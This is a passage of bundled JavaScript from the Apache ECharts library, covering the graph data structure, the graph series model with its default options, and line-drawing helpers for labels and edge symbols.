n2];\n    }\n    else {\n        return edgesMap[n1 + '-' + n2]\n            || edgesMap[n2 + '-' + n1];\n    }\n};\n\n/**\n * Iterate all nodes\n * @param  {Function} cb\n * @param  {*} [context]\n */\ngraphProto.eachNode = function (cb, context) {\n    var nodes = this.nodes;\n    var len = nodes.length;\n    for (var i = 0; i < len; i++) {\n        if (nodes[i].dataIndex >= 0) {\n            cb.call(context, nodes[i], i);\n        }\n    }\n};\n\n/**\n * Iterate all edges\n * @param  {Function} cb\n * @param  {*} [context]\n */\ngraphProto.eachEdge = function (cb, context) {\n    var edges = this.edges;\n    var len = edges.length;\n    for (var i = 0; i < len; i++) {\n        if (edges[i].dataIndex >= 0\n            && edges[i].node1.dataIndex >= 0\n            && edges[i].node2.dataIndex >= 0\n        ) {\n            cb.call(context, edges[i], i);\n        }\n    }\n};\n\n/**\n * Breadth first traverse\n * @param {Function} cb\n * @param {module:echarts/data/Graph.Node} startNode\n * @param {string} [direction='none'] 'none'|'in'|'out'\n * @param {*} [context]\n */\ngraphProto.breadthFirstTraverse = function (\n    cb, startNode, direction, context\n) {\n    if (!Node.isInstance(startNode)) {\n        startNode = this._nodesMap[generateNodeKey(startNode)];\n    }\n    if (!startNode) {\n        return;\n    }\n\n    var edgeType = direction === 'out'\n        ? 'outEdges' : (direction === 'in' ? 'inEdges' : 'edges');\n\n    for (var i = 0; i < this.nodes.length; i++) {\n        this.nodes[i].__visited = false;\n    }\n\n    if (cb.call(context, startNode, null)) {\n        return;\n    }\n\n    var queue = [startNode];\n    while (queue.length) {\n        var currentNode = queue.shift();\n        var edges = currentNode[edgeType];\n\n        for (var i = 0; i < edges.length; i++) {\n            var e = edges[i];\n            var otherNode = e.node1 === currentNode\n                ? e.node2 : e.node1;\n            if (!otherNode.__visited) {\n                if (cb.call(context, otherNode, currentNode)) {\n                    // Stop traversing\n                    return;\n                }\n                queue.push(otherNode);\n                otherNode.__visited = true;\n            }\n        }\n    }\n};\n\n// TODO\n// graphProto.depthFirstTraverse = function (\n//     cb, startNode, direction, context\n// ) {\n\n// };\n\n// Filter update\ngraphProto.update = function () {\n    var data = this.data;\n    var edgeData = this.edgeData;\n    var nodes = this.nodes;\n    var edges = this.edges;\n\n    for (var i = 0, len = nodes.length; i < len; i++) {\n        nodes[i].dataIndex = -1;\n    }\n    for (var i = 0, len = data.count(); i < len; i++) {\n        nodes[data.getRawIndex(i)].dataIndex = i;\n    }\n\n    edgeData.filterSelf(function (idx) {\n        var edge = edges[edgeData.getRawIndex(idx)];\n        return edge.node1.dataIndex >= 0 && edge.node2.dataIndex >= 0;\n    });\n\n    // Update edge\n    for (var i = 0, len = edges.length; i < len; i++) {\n        edges[i].dataIndex = -1;\n    }\n    for (var i = 0, len = edgeData.count(); i < len; i++) {\n        edges[edgeData.getRawIndex(i)].dataIndex = i;\n    }\n};\n\n/**\n * @return {module:echarts/data/Graph}\n */\ngraphProto.clone = function () {\n    var graph = new Graph(this._directed);\n    var nodes = this.nodes;\n    var edges = this.edges;\n    for (var i = 0; i < nodes.length; i++) {\n        graph.addNode(nodes[i].id, nodes[i].dataIndex);\n    }\n    for (var i = 0; i < edges.length; i++) {\n        var e = edges[i];\n        graph.addEdge(e.node1.id, e.node2.id, e.dataIndex);\n    }\n    return graph;\n};\n\n\n/**\n * @alias module:echarts/data/Graph.Node\n */\nfunction Node(id, dataIndex) {\n    /**\n    * @type {string}\n    */\n    this.id = id == null ? '' : id;\n\n    /**\n    * @type {Array.<module:echarts/data/Graph.Edge>}\n    */\n    this.inEdges = [];\n    /**\n    * @type {Array.<module:echarts/data/Graph.Edge>}\n    */\n    this.outEdges = [];\n    /**\n    * @type {Array.<module:echarts/data/Graph.Edge>}\n    */\n    this.edges = [];\n    /**\n     * @type {module:echarts/data/Graph}\n     */\n    this.hostGraph;\n\n    /**\n     * @type {number}\n     */\n    this.dataIndex = dataIndex == null ? -1 : dataIndex;\n}\n\nNode.prototype = {\n\n    constructor: Node,\n\n    /**\n     * @return {number}\n     */\n    degree: function () {\n        return this.edges.length;\n    },\n\n    /**\n     * @return {number}\n     */\n    inDegree: function () {\n        return this.inEdges.length;\n    },\n\n    /**\n    * @return {number}\n    */\n    outDegree: function () {\n        return this.outEdges.length;\n    },\n\n    /**\n     * @param {string} [path]\n     * @return {module:echarts/model/Model}\n     */\n    getModel: function (path) {\n        if (this.dataIndex < 0) {\n            return;\n        }\n        var graph = this.hostGraph;\n        var itemModel = graph.data.getItemModel(this.dataIndex);\n\n        return itemModel.getModel(path);\n    }\n};\n\n/**\n * 图边\n * @alias module:echarts/data/Graph.Edge\n * @param {module:echarts/data/Graph.Node} n1\n * @param {module:echarts/data/Graph.Node} n2\n * @param {number} [dataIndex=-1]\n */\nfunction Edge(n1, n2, dataIndex) {\n\n    /**\n     * 节点1，如果是有向图则为源节点\n     * @type {module:echarts/data/Graph.Node}\n     */\n    this.node1 = n1;\n\n    /**\n     * 节点2，如果是有向图则为目标节点\n     * @type {module:echarts/data/Graph.Node}\n     */\n    this.node2 = n2;\n\n    this.dataIndex = dataIndex == null ? -1 : dataIndex;\n}\n\n/**\n * @param {string} [path]\n * @return {module:echarts/model/Model}\n */\nEdge.prototype.getModel = function (path) {\n    if (this.dataIndex < 0) {\n        return;\n    }\n    var graph = this.hostGraph;\n    var itemModel = graph.edgeData.getItemModel(this.dataIndex);\n\n    return itemModel.getModel(path);\n};\n\nvar createGraphDataProxyMixin = function (hostName, dataName) {\n    return {\n        /**\n         * @param {string=} [dimension='value'] Default 'value'. can be 'a', 'b', 'c', 'd', 'e'.\n         * @return {number}\n         */\n        getValue: function (dimension) {\n            var data = this[hostName][dataName];\n            return data.get(data.getDimension(dimension || 'value'), this.dataIndex);\n        },\n\n        /**\n         * @param {Object|string} key\n         * @param {*} [value]\n         */\n        setVisual: function (key, value) {\n            this.dataIndex >= 0\n                && this[hostName][dataName].setItemVisual(this.dataIndex, key, value);\n        },\n\n        /**\n         * @param {string} key\n         * @return {boolean}\n         */\n        getVisual: function (key, ignoreParent) {\n            return this[hostName][dataName].getItemVisual(this.dataIndex, key, ignoreParent);\n        },\n\n        /**\n         * @param {Object} layout\n         * @return {boolean} [merge=false]\n         */\n        setLayout: function (layout, merge$$1) {\n            this.dataIndex >= 0\n                && this[hostName][dataName].setItemLayout(this.dataIndex, layout, merge$$1);\n        },\n\n        /**\n         * @return {Object}\n         */\n        getLayout: function () {\n            return this[hostName][dataName].getItemLayout(this.dataIndex);\n        },\n\n        /**\n         * @return {module:zrender/Element}\n         */\n        getGraphicEl: function () {\n            return this[hostName][dataName].getItemGraphicEl(this.dataIndex);\n        },\n\n        /**\n         * @return {number}\n         */\n        getRawIndex: function () {\n            return this[hostName][dataName].getRawIndex(this.dataIndex);\n        }\n    };\n};\n\nmixin(Node, createGraphDataProxyMixin('hostGraph', 'data'));\nmixin(Edge, createGraphDataProxyMixin('hostGraph', 'edgeData'));\n\nGraph.Node = Node;\nGraph.Edge = Edge;\n\nenableClassCheck(Node);\nenableClassCheck(Edge);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar createGraphFromNodeEdge = function (nodes, edges, seriesModel, directed, beforeLink) {\n    // ??? TODO\n    // support dataset?\n    var graph = new Graph(directed);\n    for (var i = 0; i < nodes.length; i++) {\n        graph.addNode(retrieve(\n            // Id, name, dataIndex\n            nodes[i].id, nodes[i].name, i\n        ), i);\n    }\n\n    var linkNameList = [];\n    var validEdges = [];\n    var linkCount = 0;\n    for (var i = 0; i < edges.length; i++) {\n        var link = edges[i];\n        var source = link.source;\n        var target = link.target;\n        // addEdge may fail when source or target not exists\n        if (graph.addEdge(source, target, linkCount)) {\n            validEdges.push(link);\n            linkNameList.push(retrieve(link.id, source + ' > ' + target));\n            linkCount++;\n        }\n    }\n\n    var coordSys = seriesModel.get('coordinateSystem');\n    var nodeData;\n    if (coordSys === 'cartesian2d' || coordSys === 'polar') {\n        nodeData = createListFromArray(nodes, seriesModel);\n    }\n    else {\n        var coordSysCtor = CoordinateSystemManager.get(coordSys);\n        var coordDimensions = (coordSysCtor && coordSysCtor.type !== 'view')\n            ? (coordSysCtor.dimensions || []) : [];\n        // FIXME: Some geo do not need `value` dimenson, whereas `calendar` needs\n        // `value` dimension, but graph need `value` dimension. It's better to\n        // uniform this behavior.\n        if (indexOf(coordDimensions, 'value') < 0) {\n            coordDimensions.concat(['value']);\n        }\n\n        var dimensionNames = createDimensions(nodes, {\n            coordDimensions: coordDimensions\n        });\n        nodeData = new List(dimensionNames, seriesModel);\n        nodeData.initData(nodes);\n    }\n\n    var edgeData = new List(['value'], seriesModel);\n    edgeData.initData(validEdges, linkNameList);\n\n    beforeLink && beforeLink(nodeData, edgeData);\n\n    linkList({\n        mainData: nodeData,\n        struct: graph,\n        structAttr: 'graph',\n        datas: {node: nodeData, edge: edgeData},\n        datasAttr: {node: 'data', edge: 'edgeData'}\n    });\n\n    // Update dataIndex of nodes and edges because invalid edge may be removed\n    graph.update();\n\n    return graph;\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar GraphSeries = extendSeriesModel({\n\n    type: 'series.graph',\n\n    init: function (option) {\n        GraphSeries.superApply(this, 'init', arguments);\n\n        var self = this;\n        function getCategoriesData() {\n            return self._categoriesData;\n        }\n        // Provide data for legend select\n        this.legendVisualProvider = new LegendVisualProvider(\n            getCategoriesData, getCategoriesData\n        );\n\n        this.fillDataTextStyle(option.edges || option.links);\n\n        this._updateCategoriesData();\n    },\n\n    mergeOption: function (option) {\n        GraphSeries.superApply(this, 'mergeOption', arguments);\n\n        this.fillDataTextStyle(option.edges || option.links);\n\n        this._updateCategoriesData();\n    },\n\n    mergeDefaultAndTheme: function (option) {\n        GraphSeries.superApply(this, 'mergeDefaultAndTheme', arguments);\n        defaultEmphasis(option, ['edgeLabel'], ['show']);\n    },\n\n    getInitialData: function (option, ecModel) {\n        var edges = option.edges || option.links || [];\n        var nodes = option.data || option.nodes || [];\n        var self = this;\n\n        if (nodes && edges) {\n            return createGraphFromNodeEdge(nodes, edges, this, true, beforeLink).data;\n        }\n\n        function beforeLink(nodeData, edgeData) {\n            // Overwrite nodeData.getItemModel to\n            nodeData.wrapMethod('getItemModel', function (model) {\n                var categoriesModels = self._categoriesModels;\n                var categoryIdx = model.getShallow('category');\n                var categoryModel = categoriesModels[categoryIdx];\n                if (categoryModel) {\n                    categoryModel.parentModel = model.parentModel;\n                    model.parentModel = categoryModel;\n                }\n                return model;\n            });\n\n            var edgeLabelModel = self.getModel('edgeLabel');\n            // For option `edgeLabel` can be found by label.xxx.xxx on item mode.\n            var fakeSeriesModel = new Model(\n                {label: edgeLabelModel.option},\n                edgeLabelModel.parentModel,\n                ecModel\n            );\n            var emphasisEdgeLabelModel = self.getModel('emphasis.edgeLabel');\n            var emphasisFakeSeriesModel = new Model(\n                {emphasis: {label: emphasisEdgeLabelModel.option}},\n                emphasisEdgeLabelModel.parentModel,\n                ecModel\n            );\n\n            edgeData.wrapMethod('getItemModel', function (model) {\n                model.customizeGetParent(edgeGetParent);\n                return model;\n            });\n\n            function edgeGetParent(path) {\n                path = this.parsePath(path);\n                return (path && path[0] === 'label')\n                    ? fakeSeriesModel\n                    : (path && path[0] === 'emphasis' && path[1] === 'label')\n                    ? emphasisFakeSeriesModel\n                    : this.parentModel;\n            }\n        }\n    },\n\n    /**\n     * @return {module:echarts/data/Graph}\n     */\n    getGraph: function () {\n        return this.getData().graph;\n    },\n\n    /**\n     * @return {module:echarts/data/List}\n     */\n    getEdgeData: function () {\n        return this.getGraph().edgeData;\n    },\n\n    /**\n     * @return {module:echarts/data/List}\n     */\n    getCategoriesData: function () {\n        return this._categoriesData;\n    },\n\n    /**\n     * @override\n     */\n    formatTooltip: function (dataIndex, multipleSeries, dataType) {\n        if (dataType === 'edge') {\n            var nodeData = this.getData();\n            var params = this.getDataParams(dataIndex, dataType);\n            var edge = nodeData.graph.getEdgeByIndex(dataIndex);\n            var sourceName = nodeData.getName(edge.node1.dataIndex);\n            var targetName = nodeData.getName(edge.node2.dataIndex);\n\n            var html = [];\n            sourceName != null && html.push(sourceName);\n            targetName != null && html.push(targetName);\n            html = encodeHTML(html.join(' > '));\n\n            if (params.value) {\n                html += ' : ' + encodeHTML(params.value);\n            }\n            return html;\n        }\n        else { // dataType === 'node' or empty\n            return GraphSeries.superApply(this, 'formatTooltip', arguments);\n        }\n    },\n\n    _updateCategoriesData: function () {\n        var categories = map(this.option.categories || [], function (category) {\n            // Data must has value\n            return category.value != null ? category : extend({\n                value: 0\n            }, category);\n        });\n        var categoriesData = new List(['value'], this);\n        categoriesData.initData(categories);\n\n        this._categoriesData = categoriesData;\n\n        this._categoriesModels = categoriesData.mapArray(function (idx) {\n            return categoriesData.getItemModel(idx, true);\n        });\n    },\n\n    setZoom: function (zoom) {\n        this.option.zoom = zoom;\n    },\n\n    setCenter: function (center) {\n        this.option.center = center;\n    },\n\n    isAnimationEnabled: function () {\n        return GraphSeries.superCall(this, 'isAnimationEnabled')\n            // Not enable animation when do force layout\n            && !(this.get('layout') === 'force' && this.get('force.layoutAnimation'));\n    },\n\n    defaultOption: {\n        zlevel: 0,\n        z: 2,\n\n        coordinateSystem: 'view',\n\n        // Default option for all coordinate systems\n        // xAxisIndex: 0,\n        // yAxisIndex: 0,\n        // polarIndex: 0,\n        // geoIndex: 0,\n\n        legendHoverLink: true,\n\n        hoverAnimation: true,\n\n        layout: null,\n\n        focusNodeAdjacency: false,\n\n        // Configuration of circular layout\n        circular: {\n            rotateLabel: false\n        },\n        // Configuration of force directed layout\n        force: {\n            initLayout: null,\n            // Node repulsion. Can be an array to represent range.\n            repulsion: [0, 50],\n            gravity: 0.1,\n            // Initial friction\n            friction: 0.6,\n\n            // Edge length. Can be an array to represent range.\n            edgeLength: 30,\n\n            layoutAnimation: true\n        },\n\n        left: 'center',\n        top: 'center',\n        // right: null,\n        // bottom: null,\n        // width: '80%',\n        // height: '80%',\n\n        symbol: 'circle',\n        symbolSize: 10,\n\n        edgeSymbol: ['none', 'none'],\n        edgeSymbolSize: 10,\n        edgeLabel: {\n            position: 'middle',\n            distance: 5\n        },\n\n        draggable: false,\n\n        roam: false,\n\n        // Default on center of graph\n        center: null,\n\n        zoom: 1,\n        // Symbol size scale ratio in roam\n        nodeScaleRatio: 0.6,\n        // cursor: null,\n\n        // categories: [],\n\n        // data: []\n        // Or\n        // nodes: []\n        //\n        // links: []\n        // Or\n        // edges: []\n\n        label: {\n            show: false,\n            formatter: '{b}'\n        },\n\n        itemStyle: {},\n\n        lineStyle: {\n            color: '#aaa',\n            width: 1,\n            curveness: 0,\n            opacity: 0.5\n        },\n        emphasis: {\n            label: {\n                show: true\n            }\n        }\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Line path for bezier and straight line draw\n */\n\nvar straightLineProto = Line.prototype;\nvar bezierCurveProto = BezierCurve.prototype;\n\nfunction isLine(shape) {\n    return isNaN(+shape.cpx1) || isNaN(+shape.cpy1);\n}\n\nvar LinePath = extendShape({\n\n    type: 'ec-line',\n\n    style: {\n        stroke: '#000',\n        fill: null\n    },\n\n    shape: {\n        x1: 0,\n        y1: 0,\n        x2: 0,\n        y2: 0,\n        percent: 1,\n        cpx1: null,\n        cpy1: null\n    },\n\n    buildPath: function (ctx, shape) {\n        this[isLine(shape) ? '_buildPathLine' : '_buildPathCurve'](ctx, shape);\n    },\n    _buildPathLine: straightLineProto.buildPath,\n    _buildPathCurve: bezierCurveProto.buildPath,\n\n    pointAt: function (t) {\n        return this[isLine(this.shape) ? '_pointAtLine' : '_pointAtCurve'](t);\n    },\n    _pointAtLine: straightLineProto.pointAt,\n    _pointAtCurve: bezierCurveProto.pointAt,\n\n    tangentAt: function (t) {\n        var shape = this.shape;\n        var p = isLine(shape)\n            ? [shape.x2 - shape.x1, shape.y2 - shape.y1]\n            : this._tangentAtCurve(t);\n        return normalize(p, p);\n    },\n    _tangentAtCurve: bezierCurveProto.tangentAt\n\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @module echarts/chart/helper/Line\n */\n\nvar SYMBOL_CATEGORIES = ['fromSymbol', 'toSymbol'];\n\nfunction makeSymbolTypeKey(symbolCategory) {\n    return '_' + symbolCategory + 'Type';\n}\n/**\n * @inner\n */\nfunction createSymbol$1(name, lineData, idx) {\n    var color = lineData.getItemVisual(idx, 'color');\n    var symbolType = lineData.getItemVisual(idx, name);\n    var symbolSize = lineData.getItemVisual(idx, name + 'Size');\n\n    if (!symbolType || symbolType === 'none') {\n        return;\n    }\n\n    if (!isArray(symbolSize)) {\n        symbolSize = [symbolSize, symbolSize];\n    }\n    var symbolPath = createSymbol(\n        symbolType, -symbolSize[0] / 2, -symbolSize[1] / 2,\n        symbolSize[0], symbolSize[1], color\n    );\n\n    symbolPath.name = name;\n\n    return symbolPath;\n}\n\nfunction createLine(points) {\n    var line = new LinePath({\n        name: 'line',\n        subPixelOptimize: true\n    });\n    setLinePoints(line.shape, points);\n    return line;\n}\n\nfunction setLinePoints(targetShape, points) {\n    targetShape.x1 = points[0][0];\n    targetShape.y1 = points[0][1];\n    targetShape.x2 = points[1][0];\n    targetShape.y2 = points[1][1];\n    targetShape.percent = 1;\n\n    var cp1 = points[2];\n    if (cp1) {\n        targetShape.cpx1 = cp1[0];\n        targetShape.cpy1 = cp1[1];\n    }\n    else {\n        targetShape.cpx1 = NaN;\n        targetShape.cpy1 = NaN;\n    }\n}\n\nfunction updateSymbolAndLabelBeforeLineUpdate() {\n    var lineGroup = this;\n    var symbolFrom = lineGroup.childOfName('fromSymbol');\n    var symbolTo = lineGroup.childOfName('toSymbol');\n    var label = lineGroup.childOfName('label');\n    // Quick reject\n    if (!symbolFrom && !symbolTo && label.ignore) {\n        return;\n    }\n\n    var invScale = 1;\n    var parentNode = this.parent;\n    while (parentNode) {\n        if (parentNode.scale) {\n            invScale /= parentNode.scale[0];\n        }\n        parentNode = parentNode.parent;\n    }\n\n    var line = lineGroup.childOfName('line');\n    // If line not changed\n    // FIXME Parent scale changed\n    if (!this.__dirty && !line.__dirty) {\n        return;\n    }\n\n    var percent = line.shape.percent;\n    var fromPos = line.pointAt(0);\n    var toPos = line.pointAt(percent);\n\n    var d = sub([], toPos, fromPos);\n    normalize(d, d);\n\n    if (symbolFrom) {\n        symbolFrom.attr('position', fromPos);\n        var tangent = line.tangentAt(0);\n        symbolFrom.attr('rotation', Math.PI / 2 - Math.atan2(\n            tangent[1], tangent[0]\n        ));\n        symbolFrom.attr('scale', [invScale * percent, invScale * percent]);\n    }\n    if (symbolTo) {\n        symbolTo.attr('position', toPos);\n        var tangent = line.tangentAt(1);\n        symbolTo.attr('rotation', -Math.PI / 2 - Math.atan2(\n            tangent[1], tangent[0]\n        ));\n        symbolTo.attr('scale', [invScale * percent, invScale * percent]);\n    }\n\n    if (!label.ignore) {\n        label.attr('position', toPos);\n\n        var textPosition;\n        var textAlign;\n        var textVerticalAlign;\n        var textOrigin;\n\n        var distance$$1 = label.__labelDistance;\n        var distanceX = distance$$1[0] * invScale;\n        var distanceY = distance$$1[1] * invScale;\n        var halfPercent = percent / 2;\n        var tangent = line.tangentAt(halfPercent);\n        var n = [tangent[1], -tangent[0]];\n        var cp = line.pointAt(halfPercent);\n        if (n[1] > 0) {\n            n[0] = -n[0];\n            n[1] = -n[1];\n        }\n        var dir = tangent[0] < 0 ? -1 : 1;\n\n        if (label.__position !== 'start' && label.__position !== 'end') {\n            var rotation = -Math.atan2(tangent[1], tangent[0]);\n            if (toPos[0] < fromPos[0]) {\n                rotation = Math.PI + rotation;\n            }\n            label.attr('rotation', rotation);\n        }\n\n        var dy;\n        switch (label.__position) {\n            case 'insideStartTop':\n            case 'insideMiddleTop':\n            case 'insideEndTop':\n            case 'middle':\n                dy = -distanceY;\n                textVerticalAlign = 'bottom';\n                break;\n\n            case 'insideStartBottom':\n            case 'insideMiddleBottom':\n            case 'insideEndBottom':\n                dy = distanceY;\n                textVerticalAlign = 'top';\n                break;\n\n            default:\n                dy = 0;\n                textVerticalAlign = 'middle';\n        }\n\n        switch (label.__position) {\n            case 'end':\n                textPosition = [d[0] * distanceX + toPos[0], d[1] * distanceY + toPos[1]];\n                textAlign = d[0] > 0.8 ? 'left' : (d[0] < -0.8 ? 'right' : 'center');\n                textVerticalAlign = d[1] > 0.8 ? 'top' : (d[1] < -0.8 ? 'bottom' : 'middle');\n                break;\n\n            case 'start':\n                textPosition = [-d[0] * distanceX + fromPos[0], -d[1] * distanceY + fromPos[1]];\n                textAlign = d[0] > 0.8 ? 'right' : (d[0] < -0.8 ? 'left' : 'center');\n                textVerticalAlign = d[1] > 0.8 ? 'bottom' : (d[1] < -0.8 ? 'top' : 'middle');\n                break;\n\n            case 'insideStartTop':\n            case 'insideStart':\n            case 'insideStartBottom':\n                textPosition = [distanceX * dir + fromPos[0], fromPos[1] + dy];\n                textAlign = tangent[0] < 0 ? 'right' : 'left';\n                textOrigin = [-distanceX * dir, -dy];\n                break;\n\n            case 'insideMiddleTop':\n            case 'insideMiddle':\n            case 'insideMiddleBottom':\n            case 'middle':\n                textPosition = [cp[0], cp[1] + dy];\n                textAlign = 'center';\n                textOrigin = [0, -dy];\n                break;\n\n            case 'insideEndTop':\n            case 'insideEnd':\n            case 'insideEndBottom':\n                textPosition = [-distanceX * dir + toPos[0], toPos[1] + dy];\n                textAlign = tangent[0] >= 0 ? 'right' : 'left';\n                textOrigin = [distanceX * dir, -dy];\n                break;\n        }\n\n        label.attr({\n            style: {\n                // Use the user specified text align and baseline first\n                textVerticalAlign: label.__verticalAlign || textVerticalAlign,\n                textAlign: label.__textAlign || textAlign\n            },\n            position: textPosition,\n            scale: [invScale, invScale],\n            origin: textOrigin\n        });\n    }\n}\n\n/**\n * @constructor\n * @extends {module:zrender/graphic/Group}\n * @alias {module:echarts/chart/helper/Line}\n */\nfunction Line$1(lineData, idx, seriesScope) {\n    Group.call(this);\n\n    this._createLine(lineData, idx, seriesScope);\n}\n\nvar lineProto = Line$1.prototype;\n\n// Update symbol position and rotation\nlineProto.beforeUpdate = updateSymbolAndLabelBeforeLineUpdate;\n\nlineProto._createLine = function (lineData, idx, seriesScope) {\n    var seriesModel = lineData.hostModel;\n    var linePoints = lineData.getItemLayout(idx);\n    var line = createLine(linePoints);\n    line.shape.percent = 0;\n    initProps(line, {\n        shape: {\n            percent: 1\n        }\n    }, seriesModel, idx);\n\n    this.add(line);\n\n    var label = new Text({\n        name: 'label',\n        // FIXME\n        // Temporary solution for `focusNodeAdjacency`.\n        // line label do not use the opacity of lineStyle.\n        lineLabelOriginalOpacity: 1\n    });\n    this.add(label);\n\n    each$1(SYMBOL_CATEGORIES, function (symbolCategory) {\n        var symbol = createSymbol$1(symbolCategory, lineData, idx);\n        // symbols must added after line to make sure\n        // it will be updated after line#update.\n        // Or symbol position and rotation update in line#beforeUpdate will be one frame slow\n        this.add(symbol);\n        this[makeSymbolTypeKey(symbolCategory)] = lineData.getItemVisual(idx, symbolCategory);\n    }, this);\n\n    this._updateCommonStl(lineData, idx, seriesScope);\n};\n\nlineProto.updateData = function (lineData, idx, seriesScope) {\n    var seriesModel = lineData.hostModel;\n\n    var line = this.childOfName('line');\n    var linePoints = lineData.getItemLayout(idx);\n    var target = {\n        shape: {}\n    };\n\n    setLinePoints(target.shape, linePoints);\n    updateProps(line, target, seriesModel, idx);\n\n    each$1(SYMBOL_CATEGORIES, function (symbolCategory) {\n        var symbolType = lineData.getItemVisual(idx, symbolCategory);\n        var key = makeSymbolTypeKey(symbolCategory);\n        // Symbol changed\n        if (this[key] !== symbolType) {\n            this.remove(this.childOfName(symbolCategory));\n            var symbol = createSymbol$1(symbolCategory, lineData, idx);\n            this.add(symbol);\n        }\n        this[key] = symbolType;\n    }, this);\n\n    this._updateCommonStl(lineData, idx, seriesScope);\n};\n\nlineProto._updateCommonStl = function (lineData, idx, seriesScope) {\n    var seriesModel = lineData.hostModel;\n\n    var line = this.childOfName('line');\n\n    var lineStyle = seriesScope && seriesScope.lineStyle;\n    var hoverLineStyle = seriesScope && seriesScope.hoverLineStyle;\n    var labelModel = seriesScope && seriesScope.labelModel;\n    var hoverLabelModel = seriesScope && seriesScope.hoverLabelModel;\n\n    // Optimization for large dataset\n    if (!seriesScope || lineData.hasItemOption) {\n        var itemModel = lineData.getItemModel(idx);\n\n        lineStyle = itemModel.getModel('lineStyle').getLineStyle();\n        hoverLineStyle = itemModel.getModel('emphasis.lineStyle').getLineStyle();\n\n        labelModel = itemModel.getModel('label');\n        hoverLabelModel = itemModel.getModel('emphasis.label');\n    }\n\n    var visualColor = lineData.getItemVisual(idx, 'color');\n    var visualOpacity = retrieve3(\n        lineData.getItemVisual(idx, 'opacity'),\n        lineStyle.opacity,\n        1\n    );\n\n    line.useStyle(defaults(\n        {\n            strokeNoScale: true,\n            fill: 'none',\n            stroke: visualColor,\n            opacity: visualOpacity\n        },\n        lineStyle\n    ));\n    line.hoverStyle = hoverLineStyle;\n\n    // Update symbol\n    each$1(SYMBOL_CATEGORIES, function (symbolCategory) {\n        var symbol = this.childOfName(symbolCategory);\n        if (symbol) {\n            symbol.setColor(visualColor);\n            symbol.setStyle({\n                opacity: visualOpacity\n            });\n        }\n    }, this);\n\n    var showLabel = labelModel.getShallow('show');\n    var hoverShowLabel = hoverLabelModel.getShallow('show');\n\n    var label = this.childOfName('label');\n    var defaultLabelColor;\n    var baseText;\n\n    // FIXME: the logic below probably should be merged to `graphic.setLabelStyle`.\n    if (showLabel || hoverShowLabel) {\n        defaultLabelColor = visualColor || '#000';\n\n        baseText = seriesModel.getFormattedLabel(idx, 'normal', lineData.dataType);\n        if (baseText == null) {\n            var rawVal = seriesModel.getRawValue(idx);\n            baseText = rawVal == null\n                ? lineData.getName(idx)\n                : isFinite(rawVal)\n                ? round$1(rawVal)\n                : rawVal;\n        }\n    }\n    var normalText = showLabel ? baseText : null;\n    var emphasisText = hoverShowLabel\n        ? retrieve2(\n            seriesModel.getFormattedLabel(idx, 'emphasis', lineData.dataType),\n            baseText\n        )\n        : null;\n\n    var labelStyle = label.style;\n\n    // Always set `textStyle` even if `normalStyle.text` is null, because default\n    // values have to be set on `normalStyle`.\n    if (normalText != null || emphasisText != null) {\n        setTextStyle(label.style, labelModel, {\n            text: normalText\n        }, {\n            autoColor: defaultLabelColor\n        });\n\n        label.__textAlign = labelStyle.textAlign;\n        label.__verticalAlign = labelStyle.textVerticalAlign;\n        // 'start', 'middle', 'end'\n        label.__position = labelModel.get('position') || 'middle';\n\n        var distance$$1 = labelModel.get('distance');\n        if (!isArray(distance$$1)) {\n            distance$$1 = [distance$$1, distance$$1];\n        }\n        label.__labelDistance = distance$$1;\n    }\n\n    if (emphasisText != null) {\n        // Only these properties supported in this emphasis style here.\n        label.hoverStyle = {\n            text: emphasisText,\n            textFill: hoverLabelModel.getTextColor(true),\n            // For merging hover style to normal style, do not use\n            // `hoverLabelModel.getFont()` here.\n            fontStyle: hoverLabelModel.getShallow('fontStyle'),\n            fontWeight: hoverLabelModel.getShallow('fontWeight'),\n            fontSize: hoverLabelModel.getShallow('fontSize'),\n            fontFamily: hoverLabelModel.getShallow('fontFamily')\n        };\n    }\n    else {\n        label.hoverStyle = {\n            text: null\n        };\n    }\n\n    label.ignore = !showLabel && !hoverShowLabel;\n\n    setHoverStyle(this);\n};\n\nlineProto.highlight = function () {\n    this.trigger('emphasis');\n};\n\nlineProto.downplay = function () {\n    